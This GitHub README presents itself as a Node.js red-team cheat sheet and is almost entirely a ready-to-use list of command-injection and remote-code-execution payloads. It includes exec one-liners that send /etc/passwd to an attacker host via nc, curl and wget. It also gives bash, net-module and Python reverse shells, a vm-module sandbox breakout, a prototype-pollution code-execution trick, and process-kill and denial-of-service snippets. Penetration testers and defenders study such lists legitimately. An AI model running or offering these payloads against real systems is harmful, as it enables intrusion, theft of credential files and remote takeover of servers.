aadityapurani / NodeJS-Red-Team-Cheat-Sheet

Licence: other


NodeJS Red Team Cheat Sheet

A curated list of Node.js command injection / RCE payloads.

Know the evil functions

eval(), setTimeout(), setInterval(), Function(), unserialize()

Anything that turns attacker-controlled text into code: eval() and the Function() constructor directly; setTimeout()/setInterval() when handed a string instead of a callback (a browser behaviour, Node's timers reject a non-function callback); unserialize() from the node-serialize package, which evaluates serialized functions while deserializing.

Know your weapons

fs, child_process, net, http

spawn() = launches the program directly from an argv array (no shell unless shell: true) and returns a ChildProcess whose stdout/stderr are streams, so it copes with large or binary output.

exec() = runs the command string through /bin/sh -c and buffers the whole output (up to maxBuffer, 1 MiB by default in current Node); use it for short output and an exit status. Because a shell is involved, metacharacters such as ;, | and $( ) in the payloads below are interpreted.

Attack Vectors

Denial of Service

while(1)

Exit the running process

process.exit()

Kill Process

process.kill(process.pid)

List the current working directory

res.end(require('fs').readdirSync('.').toString())

List the parent directory

res.end(require('fs').readdirSync('..').toString())

Read a file (fname is the target path)

res.end(require('fs').readFileSync(fname))

Spawn magic (by @aaditya_purani)

require('child_process').spawn('ls',['-a']).stdout.on('data', function (data) {console.log('own'+ data); });

Child exec (by @artsploit). The payloads are URL-encoded for a GET parameter: + is a space and %26 is &.

require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
require('child_process').exec('curl+-F+"x=`cat+/etc/passwd`"+attackersip.com')

Wget post data (by @brutelogic)

require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')

Reverse shell using net (by ibreak.software), URL-encoded as above

var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

Using arguments[1] as the response object (by @OrhanAlbay). When eval() runs inside an Express-style (req, res) handler, arguments[1] is res, so output can be written to the HTTP response without knowing the variable name.

arguments[1].end(require('child_process').execSync('whoami'))
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))

Bypass stream limits by compressing to gzip (by @aaditya_purani)

const pwn=require('zlib').createGzip();const inx=require('fs').createReadStream('app.json');const oux = require('fs').createWriteStream('unrestrictive.gz');inx.pipe(pwn).pipe(oux)

Sandbox bypass with spawnSync (by NetSPI). Python reverse shell to 127.0.0.1:443 launched from Node:

const { spawnSync } = require('child_process');
var resp = spawnSync('python', [
  '-c',
  'import socket,subprocess,os;' +
  's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' +
  's.connect(("127.0.0.1",443));' +
  'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
  'p=subprocess.call(["/bin/sh","-i"]);'
]);
console.log(resp.stdout);
console.log(resp.stderr);

vm module breakout (by pwnisher). this.constructor is the host realm's Object, so its constructor is the host Function, which evaluates code outside the context:

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

Alternative RCE payload (by mahmoud). Avoids eval() and function literals by making every object stringify to the payload and letting Function() coerce the global object into its body:

x = ''
// bind String.prototype.toString to the payload text, so calling it returns that text
myToString = x.toString.bind("console.log(process.env)")
// wrap it in an array to obtain a property descriptor for the bound function
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
// every object now stringifies to the payload, including the global object
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
// Object.constructor is Function; `this` is coerced to a string and becomes the function body
Object.constructor("test", this)()

Need more?

The repository will be maintained from time to time. Feel free to contribute.

Contact

@aaditya_purani
